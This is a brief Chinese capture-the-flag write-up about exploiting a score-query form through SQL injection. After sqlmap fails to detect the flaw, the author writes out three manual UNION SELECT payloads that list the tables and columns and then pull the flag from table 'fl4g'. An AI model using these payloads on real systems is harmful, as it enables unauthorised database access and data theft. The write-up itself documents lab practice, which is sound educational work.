打开网页之后,看到的是一个输入框,输入 id 可以查询成绩信息。看到输入,就先想到注入,试了个 and 1=1 就检测出存在 SQL 注入。
image.png
image.png
然后第一时间想的是拿 sqlmap 来扫,但是用 --forms 检测 post 注入,竟然提示我不存在注入??? WTF???
看来还是得靠双手致富啊
id=0' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),version(),user(),4#
id=0' union select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'),version(),user(),4#
id=0' union select(select skctf_flag from fl4g),version(),user(),4#
最后得到 flag 了
image.png
网友评论